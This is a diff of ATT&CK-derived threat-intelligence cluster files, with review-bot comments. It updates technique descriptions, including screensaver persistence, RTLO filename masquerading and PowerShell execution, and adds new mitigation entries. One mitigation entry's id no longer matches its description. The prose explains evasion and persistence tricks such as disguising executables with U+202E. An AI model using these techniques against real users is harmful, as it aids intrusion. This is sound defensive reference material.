In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.\n\nAdversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).", "meta": { 
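Review bot: The new Data Destruction - T1485 description opens with `destroy data data and files`, a duplicated word. Since the entry appears to be generated from upstream ATT&CK STIX content, the fix belongs upstream or in the generator rather than as a manual edit that the next regeneration would revert. The four new Impact-tactic entries (T1485, T1495, T1496, T1489) otherwise use the same `external_id` / `kill_chain` / `mitre_data_sources` / `mitre_platforms` / `refs` layout as the surrounding entries, so no structural change is needed.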
@@ -9833,7 +10473,7 @@ "value": "Mshta - T1170" }, { - "description": "Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. (Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.exe is located in C:\\Windows\\System32\\ along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaverTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)", + "description": "Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations. \n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaverTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. 
(Citation: ESET Gazer Aug 2017)", "meta": { "external_id": "T1180", "kill_chain": [ 
@@ -9963,7 +10603,7 @@ "value": "Kerberoasting - T1208" }, { - "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.\n\nOne variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs. This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.\n\n\n### Windows\nIn another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)\n\nAn example of abuse of trusted locations in Windows would be the C:\\Windows\\System32 directory. Examples of trusted binary names that can be given to malicious binares include \"explorer.exe\" and \"svchost.exe\".\n\n### Linux\nAnother variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)\n\nAn example of abuse of trusted locations in Linux would be the /bin directory. Examples of trusted binary names that can be given to malicious binares include \"rsyncd\" and \"dbus-inotifier\". 
(Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)", + "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.\n\nOne variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs or something innocuous. An example of this is when a common system utility or program is moved and renamed to avoid detection based on its usage.(Citation: FireEye APT10 Sept 2018) This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.\n\nA third variant uses the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse.(Citation: Infosecinstitute RTLO Technique) For example, a Windows screensaver file named March 25 \\u202Excod.scr will display as March 25 rcs.docx. A JavaScript file named photo_high_re\\u202Egnp.js will be displayed as photo_high_resj.png. A common use of this technique is with spearphishing attachments since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. 
Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default. \n\n### Windows\nIn another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)\n\nAn example of abuse of trusted locations in Windows would be the C:\\Windows\\System32 directory. Examples of trusted binary names that can be given to malicious binares include \"explorer.exe\" and \"svchost.exe\".\n\n### Linux\nAnother variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)\n\nAn example of abuse of trusted locations in Linux would be the /bin directory. Examples of trusted binary names that can be given to malicious binares include \"rsyncd\" and \"dbus-inotifier\". (Citation: Fysbis Palo Alto Analysis) (Citation: Fysbis Dr Web Analysis)", "meta": { "external_id": "T1036", "kill_chain": [ 
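Review bot: The RTLO examples in the new Masquerading - T1036 description are encoded as the literal text `\\u202E` (a JSON-escaped backslash, so a parser yields the six characters `\u202E`), not the actual U+202E code point; this is the correct encoding and worth preserving. If the generator ever emitted the real control character, anything rendering the cluster description would display the following characters reversed, and a downstream consumer could carry a bidi override into its own UI. A generator-side check that no description string contains the U+202E or U+202D code points would guard against that regression.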
@@ -9981,18 +10621,23 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1036", + "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", + "https://resources.infosecinstitute.com/spoof-using-right-to-left-override-rtlo-technique-2/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/", + "https://securelist.com/zero-day-vulnerability-in-telegram/83800/", "https://www.endgame.com/blog/how-hunt-masquerade-ball", "https://www.f-secure.com/documents/996508/1030745/CozyDuke", "https://www.welivesecurity.com/2016/03/30/meet-remaiten-a-linux-bot-on-steroids-targeting-routers-and-potentially-other-iot-devices/", "https://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", - "https://vms.drweb.com/virus/?i=4276269" + "https://vms.drweb.com/virus/?i=4276269", + "https://twitter.com/ItsReallyNick/status/1055321652777619457" ] }, "uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "value": "Masquerading - T1036" }, { - "description": "Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. 
Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macos being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. (Citation: Metasploit) (Citation: Metasploit), (Citation: Veil) (Citation: Veil), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", + "description": "Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.\n\nScripts can be embedded inside Office documents as macros that can be set to execute when files used in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), where adversaries will rely on macros being allowed or that the user will accept to activate them.\n\nMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. 
(Citation: Metasploit) (Citation: Metasploit), (Citation: Veil) (Citation: Veil), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)", "meta": { "external_id": "T1064", "kill_chain": [ @@ -10011,10 +10656,10 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1064", - "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", "http://www.metasploit.com", "https://www.veil-framework.com/framework/", "https://github.com/mattifestation/PowerSploit", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", "https://www.uperesia.com/analyzing-malicious-office-documents" ] }, 
@@ -10047,13 +10692,16 @@ "value": "Bootkit - T1067" }, { - "description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including Empire, (Citation: Github PowerShell Empire) PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)", + "description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. 
(Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)", "meta": { "external_id": "T1086", "kill_chain": [ "mitre-attack:execution" ], "mitre_data_sources": [ + "PowerShell logs", + "Loaded DLLs", + "DLL monitoring", "Windows Registry", "File monitoring", "Process monitoring", @@ -10064,12 +10712,14 @@ ], "refs": [ "https://attack.mitre.org/techniques/T1086", - "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", "https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx", "https://github.com/mattifestation/PowerSploit", "https://github.com/jaredhaight/PSAttack", - "https://github.com/PowerShellEmpire/Empire", - "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf" + "http://www.sixdub.net/?p=367", + "https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/", + "https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/", + "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" ] }, "uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", 
@@ -10119,8 +10769,9 @@
 "refs": [
 "https://attack.mitre.org/techniques/T1117",
 "https://support.microsoft.com/en-us/kb/249873",
- "https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html",
- "https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/"
+ "https://web.archive.org/web/20161128183535/https://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html",
+ "https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/",
+ "https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html"
 ]
 },
 "uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a",
@@ -10299,7 +10950,38 @@ "value": "HISTCONTROL - T1148" }, { - "description": "macOS and OS X applications send AppleEvent messages to each other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program.\nAppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. \n\nAdversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command lie via osascript /path/to/script or osascript -e \"script here\".", + "description": "Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. \n\n### Internal\nAn adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages. 
While internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)\n\n### External \nWebsites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) Defacement may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)\n", + "meta": { + "external_id": "T1491", + "kill_chain": [ + "mitre-attack:impact" + ], + "mitre_data_sources": [ + "Packet capture", + "Web application firewall logs", + "Web logs", + "Packet capture" + ], + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/techniques/T1491", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf", + "https://www.intelligence.senate.gov/sites/default/files/documents/os-kmandia-033017.pdf", + "https://torrentfreak.com/anonymous-hackers-deface-russian-govt-site-to-protest-web-blocking-nsfw-180512/", + "https://documents.trendmicro.com/assets/white_papers/wp-a-deep-dive-into-defacement.pdf" + ] + }, + "uuid": "5909f20f-3c39-4795-be06-ef1ea40d350b", + "value": "Defacement - T1491" + }, + { + "description": "macOS and OS X applications send AppleEvent messages to each 
other for interprocess communications (IPC). These messages can be easily scripted with AppleScript for local or remote IPC. Osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program.\nAppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. \n\nAdversaries can use this to interact with open SSH connection, move to remote machines, and even present users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via python (Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e \"script here\".", "meta": { "external_id": "T1155", "kill_chain": [ 
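Review bot: `mitre_data_sources` for the new Defacement - T1491 entry lists `"Packet capture"` twice, as the first and the last element. A duplicate is harmless to JSON parsers but is rendered twice by anything that displays the cluster, and it suggests the upstream data or the generator does not dedupe this list. Either drop the second `"Packet capture"` (and the trailing comma after `"Web logs"`) or have the generator deduplicate the array while preserving order, so regeneration does not reintroduce it.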
@@ -10346,7 +11028,7 @@ "value": "Sudo - T1169" }, { - "description": "Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.\n\nMalicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)\n\nHooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. 
(Citation: Symantec Windows Rootkits)", + "description": "Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. \n\nHooking involves redirecting calls to these functions and can be implemented via:\n\n* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)\n* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.\n\nMalicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)\n\nHooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. 
(Citation: Symantec Windows Rootkits)", "meta": { "external_id": "T1179", "kill_chain": [ 
@@ -10367,20 +11049,20 @@
 ],
 "refs": [
 "https://attack.mitre.org/techniques/T1179",
- "https://www.adlice.com/userland-rootkits-part-1-iat-hooks/",
- "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
- "https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/",
- "http://www.gmer.net/",
- "https://www.exploit-db.com/docs/17802.pdf",
- "https://github.com/jay/gethooks",
- "https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/",
 "https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx",
- "https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx",
- "https://github.com/prekageo/winhook",
- "https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis",
+ "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
+ "https://www.adlice.com/userland-rootkits-part-1-iat-hooks/",
+ "https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/",
+ "https://www.exploit-db.com/docs/17802.pdf",
 "https://www.symantec.com/avcenter/reference/windows.rootkit.overview.pdf",
 "https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html",
- "https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/"
+ "https://github.com/prekageo/winhook",
+ "https://github.com/jay/gethooks",
+ "https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/",
+ "https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/",
+ "http://www.gmer.net/",
+ "https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx",
+ "https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis"
 ]
 },
 "uuid": "66f73398-8394-4711-85e5-34c8540b22a5",
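Review bot: The eleven deletions and eleven additions in this refs array carry exactly the same set of URLs in a different order, so the hunk is pure ordering noise rather than a content change; the same pattern appears in mitre-course-of-action.json in the @@ -343 hunk and across the run of @@ -1295 through @@ -1441 hunks, where the sixteen `related` entries of uuid 0beabf44-e8d8-4ae4-9122-ef56369a2564 are only permuted. Diffs like this bury the real edits of the series (the new mitigation entries, the T1033/T1482 change) and make relationship changes hard to review for accidental drops. If the tool that regenerates these clusters walks an unordered collection, emitting `refs` in upstream source order and sorting `related` by `dest-uuid` before serialising would keep future diffs limited to actual changes.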
@@ -10401,5 +11083,5 @@
 "value": "DNSCalc - T1324"
 }
 ],
- "version": 8
+ "version": 9
 }
diff --git a/clusters/mitre-course-of-action.json b/clusters/mitre-course-of-action.json
index 23efe07..8483059 100644
--- a/clusters/mitre-course-of-action.json
+++ b/clusters/mitre-course-of-action.json
@@ -343,14 +343,14 @@
 "type": "mitigates"
 },
 {
- "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483",
+ "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "mitigates"
 },
 {
- "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1",
+ "dest-uuid": "82f04b1e-5371-4a6f-be06-411f0f43b483",
 "tags": [
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
@@ -1016,7 +1016,7 @@
 "value": "Signed Script Proxy Execution Mitigation - T1216"
 },
 {
- "description": "Certain signed binaries that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Certain signed binaries that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these binaries if they are not required for a given system or network to prevent potential misuse by adversaries. If these binaries are required for use, then restrict execution of them to privileged accounts or groups that need to use them to lessen the opportunities for malicious use.",
 "meta": {
 "external_id": "T1218",
 "refs": [
@@ -1121,6 +1121,74 @@
 "uuid": "84d633a4-dd93-40ca-8510-40238c021931",
 "value": "Hidden Files and Directories Mitigation - T1158"
 },
+ {
+ "description": "Consider implementing IT disaster recovery plans that contain procedures for regularly taking and testing data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP)\n\nIn some cases, the means to decrypt files affected by a ransomware campaign is released to the public. Research trusted sources for public releases of decryptor tools/keys to reverse the effects of ransomware.\n\nIdentify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)",
+ "meta": {
+ "external_id": "T1486",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1486",
+ "https://www.ready.gov/business/implementation/IT",
+ "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599",
+ "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html",
+ "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm",
+ "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx",
+ "https://technet.microsoft.com/en-us/library/ee791851.aspx"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "429a5c0c-e132-45c0-a4aa-c1f736c92a1c",
+ "value": "Data Encrypted for Impact Mitigation - T1486"
+ },
+ {
+ "description": "When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate 
traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)\n\nDepending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)\n\nAs immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)",
+ "meta": {
+ "external_id": "T1498",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1498",
+ "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "d74c4a7e-ffbf-432f-9365-7ebf1f787cab",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "654addf1-47ab-410a-8578-e1a0dc2a49b8",
+ "value": "Network Denial of Service Mitigation - T1498"
+ },
+ {
+ "description": "Leverage services provided by Content Delivery Networks (CDN) or providers specializing in DoS mitigations to filter traffic upstream from services.(Citation: CERT-EU DDoS March 2017) Filter boundary traffic by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport. 
To defend against SYN floods, enable SYN Cookies.",
+ "meta": {
+ "external_id": "T1499",
+ "refs": [
+ "https://attack.mitre.org/techniques/T1499",
+ "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "c675646d-e204-4aa8-978d-e3d6d65885c4",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ }
+ ],
+ "uuid": "82c21600-ccb6-4232-8c04-ef3792b56628",
+ "value": "Endpoint Denial of Service Mitigation - T1499"
+ },
 {
 "description": "Application developers should use device-provided credential storage mechanisms such as Android's KeyStore or iOS's KeyChain. These can prevent credentials from being exposed to an adversary.",
 "meta": {
@@ -1209,9 +1277,9 @@
 {
 "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system users, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)",
 "meta": {
- "external_id": "T1033",
+ "external_id": "T1482",
 "refs": [
- "https://attack.mitre.org/techniques/T1033",
+ "https://attack.mitre.org/techniques/T1482",
 "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599",
 "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html",
 "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm",
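Review bot: In the @@ -1209 hunk the entry with uuid 16f144e4-c780-4ed2-98b4-55d14e2dfa44 has its external_id and technique URL switched from T1033 to T1482 while its description still describes acquiring information about system users, and the @@ -1226 hunk keeps `System Owner/User Discovery Mitigation` in the value and only swaps the trailing id to `- T1482`; T1482 is Domain Trust Discovery in ATT&CK, so value, description and id of this entry now disagree. This presumably mirrors the upstream STIX bundle, but it silently re-points a stable galaxy uuid at a different technique, and consumers that relied on 16f144e4… meaning T1033 — or on a T1033 mitigation existing at all — will be affected; the relation to 767dbf9e-df3f-45cb-8998-4903ab5f80c0 added in @@ -1226 presumably targets the T1482 technique object and is worth checking too. Before merging, confirm against upstream whether this course-of-action was really re-assigned, and if so make value and description consistent with the new id, otherwise restore T1033 on this uuid and add T1482 as a separate entry.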
@@ -1226,10 +1294,17 @@
 "estimative-language:likelihood-probability=\"almost-certain\""
 ],
 "type": "mitigates"
+ },
+ {
+ "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
 }
 ],
 "uuid": "16f144e4-c780-4ed2-98b4-55d14e2dfa44",
- "value": "System Owner/User Discovery Mitigation - T1033"
+ "value": "System Owner/User Discovery Mitigation - T1482"
 },
 {
